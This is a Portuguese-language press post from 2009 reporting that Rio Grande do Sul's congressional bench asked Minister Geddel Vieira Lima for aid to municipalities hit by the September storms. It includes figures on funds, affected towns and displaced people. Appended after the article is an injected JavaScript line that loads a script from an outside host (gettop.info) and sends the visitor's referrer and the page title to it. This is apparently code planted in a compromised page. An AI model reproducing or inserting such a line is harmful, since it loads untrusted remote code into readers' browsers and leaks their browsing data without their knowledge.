Bancada cobra de Geddel ajuda para municípios afetados pelas chuvas
- Posted by: Ass. Imprensa
- Posted in Geral, Notícias
- Tags:
[07/10/2009]
A bancada gaúcha, coordenada pelo deputado federal Beto Albuquerque (PSB), apresentou ao ministro da Integração Nacional, Geddel Vieira Lima, reivindicações para amenizar o drama dos municípios e das famílias atingidas pelos fortes temporais de setembro. Ao ministro, o parlamentar lembrou que cada deputado e senador do Rio Grande do Sul tornou-se uma porta de entrada das angústias dos prefeitos e suas cidades que enfrentaras chuvas e vendavais no início e no final de setembro.
Geddel pediu um relatório detalhado à bancada gaúcha e se comprometeu a encaminhar uma síntese dos recursos destinados e pendências até o momento ao Estado e o que ainda poderá ser feito para solucionar os prejuízos por meio de ações emergenciais. De acordo com a Defesa Civil do Estado, R$ 5 milhões foram enviados para cobrir os danos dos temporais registrados em 7 de setembro. Como nos dias 26 e 27 do mesmo mês novos temporais afetaram o Estado, a previsão é de que a demanda tenha dobrado e o número de municípios atingidos e que decretaram situação de emergência tenha chegado a 56. Hoje há 200 mil pessoas afetadas e mais 1,4 mil desalojadas. “Quero resolver tudo o que eu puder resolver”, afirmou o ministro aos parlamentares.
Alguns dos parlamentares presentes na reunião destacaram a necessidade de se investir recursos federais em prevenção. Geddel argumentou que mesmo com a existência do Fundo de Ação Preventiva, o governo enfrenta dificuldades em decorrência da mudança radical nos fenômenos naturais que atingem as regiões do Brasil. “Quando imaginaríamos que teríamos que destinar milhões de reais para resolver a seca do Rio Grande do Sul”, lembrou o ministro referindo-se a um fenômeno que antes era registrado somente no Nordeste.
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;